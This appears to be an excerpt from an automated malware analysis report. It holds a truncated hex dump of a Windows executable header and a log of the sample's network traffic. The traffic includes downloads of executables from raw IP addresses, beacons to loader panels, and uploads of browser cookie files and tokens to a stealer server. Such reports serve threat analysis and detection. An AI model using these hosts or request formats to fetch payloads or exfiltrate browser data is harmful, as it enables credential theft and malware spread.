69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficDNS traffic detected: number of DNS queries: 858
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 41 37 32 42 37 35 39 38 32 44 31 32 46 44 36 36 30 41 39 32 36 42 34 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB32A72B75982D12FD660A926B464F71F462AE478222FFDED0F8E1F939F
                                                Source: global trafficHTTP traffic detected: GET /files/748049926/nhDLtPT.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 37 33 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10107310101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: GET /files/5149365135/ILqcVeT.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 39 34 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10109440101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: GET /files/koloples/vertualiziren.exe HTTP/1.1Host: 45.59.120.8
                                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: dugong.ydns.euConnection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /files/5149365135/rXOl0pp.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: dugong.ydns.euContent-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 31 45 34 41 34 45 36 36 30 39 32 36 35 33 37 36 34 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 61 66 66 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="hwid"491E4A4E66092653764225------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="build"traff1------EBKEHJJDAAAAKECBGHDA--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEGHost: dugong.ydns.euContent-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 47 2d 2d 0d 0a Data Ascii: ------FBAKEHIEBKJJJJJKKKEGContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------FBAKEHIEBKJJJJJKKKEGContent-Disposition: form-data; name="message"browsers------FBAKEHIEBKJJJJJKKKEG--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: dugong.ydns.euContent-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="message"plugins------DAFBGHCAKKFCAKEBKJKK--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJDHost: dugong.ydns.euContent-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 2d 2d 0d 0a Data Ascii: ------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="message"fplugins------GIIIECBGDHJJKFIDAKJD--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEGHost: dugong.ydns.euContent-Length: 6487Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/sqlite3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 37 37 30 31 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000770100&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 39 34 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10109490101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJEHost: dugong.ydns.euContent-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 2d 2d 0d 0a Data Ascii: ------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------GHCAAAAKJJDAKECBGIJE--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIHost: dugong.ydns.euContent-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 2d 2d 0d 0a Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="file"------AECAKECAEGDHIECBGHII--
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 31 30 35 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10111050101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 31 30 36 30 31 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10111060121&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFHost: dugong.ydns.euContent-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 2d 2d 0d 0a Data Ascii: ------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file"------DAKEHIJJKEGIDHIEHDAF--
